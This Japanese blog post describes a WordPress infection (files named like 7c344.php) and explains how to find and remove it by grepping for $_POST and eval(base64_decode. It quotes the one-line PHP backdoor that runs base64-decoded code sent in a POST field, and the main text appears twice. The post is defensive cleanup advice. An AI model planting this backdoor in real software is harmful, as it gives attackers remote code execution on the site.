7c344.php ワードプレスのウィルス 追加情報
7c344.php を入手しました。
コードの内容は、こんな感じ
<?php if(isset($_POST[“cod\x65”])){eval(base64_decode($_POST[“co\x64e”]));}
?>
これがメールを送信してるわけ。
本文は、どこからか送りつけるらしい。
そすっとこいつが回り続ける。
この 7c344.php を設置したときにウィルスの本部?に
どこに設置したかを連絡して、その本部が送信を開始するってこと。
その本部の多くはサウジアラビアだという。
※経由なのかわからないけど、
足場にされているのはサウジアラビアでまちがいないらしい。
でだ、この 7c344.php は、固定のファイル名ではなく、
7c32.php とかいうのもあるみたい。
そうなるとこの 7cXXXX.php ってファイル名もあやしい(笑)
したがって、ファイル名だけで駆除するのは難しくなる。
wp-7c33.php とかってあったら、削除する時びびるべ?(笑)
一番安全なのは、根こそぎ殺すこと。つまりディレクトリごと殺す。
データベースは生きてる・・・る?みたいなので
新たにディレクトリを作って、そこにWPをインストールして復活させる。
プログラムで駆除するならば、$_POST って文字列で探しても
いいみたい。
メール送信のプラグインで使っていなければの話だけどね?
contact-form-7 では $_POST は使っていなかった。
埋め込みも考えられなくもないので、ファイルごともだし、
上記のコードを構文解析して駆除するのもありだと思う。
まぁ、手間はかかるけどディレクトリを総なめして $_POST を
探すプログラム書いて、コードそのものは手でなおすってのが
速そうだけどね?(笑)
どちらにしても WP で $_POST は使っていないし、
eval(base64_decode ってコードはつかっていない。
これを手がかりにして追跡するといい。
「参考までにver3.3のソースをみると
eval は、wp-admin/press-this.phpで2箇所、
同revisions-js.phpで1箇所。あとはコメント。
base64_decode も wp-app.php で2箇所、
wp-includes/class-IXR.php で1箇所、
同class-simplepie.php で1箇所のみ。」
プログラムを書けない人は、 grep ってコマンドを検索してみよう。
grep ってのは、複数のディレクトリ、ファイルの中から、
指定した文字列を検索してくれるツールだ。
ローカルマシン(自分のマシン)で使うならば、
WPをディレクトリごとダウンロードして
そのディレクトリを grep をつかって上記の文字列を検索すればいい。
なぜか、今回のウィルスの具体的なことが、
日本語サイトで見つけれなかったので書いてみた。
参考になれば幸いです。
やはりゆずまるカバーは便利だということも忘れずに参考にしてください。
⇒ゆずまるカバーG
こっちでかいたやつの駆除もわすれずに
⇒7c344.php ワードプレスのウィルス
コードの内容は、こんな感じ
<?php if(isset($_POST[“cod\x65”])){eval(base64_decode($_POST[“co\x64e”]));}
?>
これがメールを送信してるわけ。
本文は、どこからか送りつけるらしい。
そすっとこいつが回り続ける。
この 7c344.php を設置したときにウィルスの本部?に
どこに設置したかを連絡して、その本部が送信を開始するってこと。
その本部の多くはサウジアラビアだという。
※経由なのかわからないけど、
足場にされているのはサウジアラビアでまちがいないらしい。
でだ、この 7c344.php は、固定のファイル名ではなく、
7c32.php とかいうのもあるみたい。
そうなるとこの 7cXXXX.php ってファイル名もあやしい(笑)
したがって、ファイル名だけで駆除するのは難しくなる。
wp-7c33.php とかってあったら、削除する時びびるべ?(笑)
一番安全なのは、根こそぎ殺すこと。つまりディレクトリごと殺す。
データベースは生きてる・・・る?みたいなので
新たにディレクトリを作って、そこにWPをインストールして復活させる。
プログラムで駆除するならば、$_POST って文字列で探しても
いいみたい。
メール送信のプラグインで使っていなければの話だけどね?
contact-form-7 では $_POST は使っていなかった。
埋め込みも考えられなくもないので、ファイルごともだし、
上記のコードを構文解析して駆除するのもありだと思う。
まぁ、手間はかかるけどディレクトリを総なめして $_POST を
探すプログラム書いて、コードそのものは手でなおすってのが
速そうだけどね?(笑)
どちらにしても WP で $_POST は使っていないし、
eval(base64_decode ってコードはつかっていない。
これを手がかりにして追跡するといい。
「参考までにver3.3のソースをみると
eval は、wp-admin/press-this.phpで2箇所、
同revisions-js.phpで1箇所。あとはコメント。
base64_decode も wp-app.php で2箇所、
wp-includes/class-IXR.php で1箇所、
同class-simplepie.php で1箇所のみ。」
プログラムを書けない人は、 grep ってコマンドを検索してみよう。
grep ってのは、複数のディレクトリ、ファイルの中から、
指定した文字列を検索してくれるツールだ。
ローカルマシン(自分のマシン)で使うならば、
WPをディレクトリごとダウンロードして
そのディレクトリを grep をつかって上記の文字列を検索すればいい。
なぜか、今回のウィルスの具体的なことが、
日本語サイトで見つけれなかったので書いてみた。
参考になれば幸いです。
やはりゆずまるカバーは便利だということも忘れずに参考にしてください。
⇒ゆずまるカバーG
こっちでかいたやつの駆除もわすれずに
⇒7c344.php ワードプレスのウィルス
百戦錬磨の老兵プログラマでWEBプロデューサーのゆずまるです。
大御所アフィリエイターのあの方に「あのゆずまる」とまで言わしめた、プログラマアフィリエイターの視点で、情報商材をご紹介いたします。
あなた同様「楽しく楽な高額報酬アフィリエイト」をモットウにしています。
コンピュータの専門学校の講師の経験から超初心者のあなたでもサポートばっちり♪
安心してね?
→
プロフィール
あなたは、ゆずまるを知らなくとも、ゆずまるは、生まれる前からあなたを知ってます。(オカルトですか?!>自分)
こんなノリでもノリで答えたりしませんから。
こんなノリでもノリで答えたりしませんから。
- COREサーバー
- CRONで選択
- FileQ
- MySQLデータベース
- NSFレンタルサーバー
- Xサーバー
- すみだサーバー
- みんなのドメイン
- ゴミサーバー
- サイト量産用、保管庫
- サクラサーバー
- サーバーに関する情報
- サーバーカウボーイ
- サーバーレビュー一覧
- サーバー個別評価
- ダメサーバー
- チカッパ
- ドメインキング
- ドメイン取得
- ハッスルサーバー
- ヘテムル
- メインサーバー
- メールエイリアス
- レオサーバー
- ロケットネット
- ロリポップ
- ワッピー
- ワードプレスのウィルス
- 使えるネット
- 優良サーバー
- 未分類
- 格安サーバー比較ランキング
- 激安サーバー
- 無限サーバー
- 目的別サーバー選び
- 超優良サーバー
- 雑学・雑知識
- 123サーバー
- 99円サーバー
- IP分散、サテライト
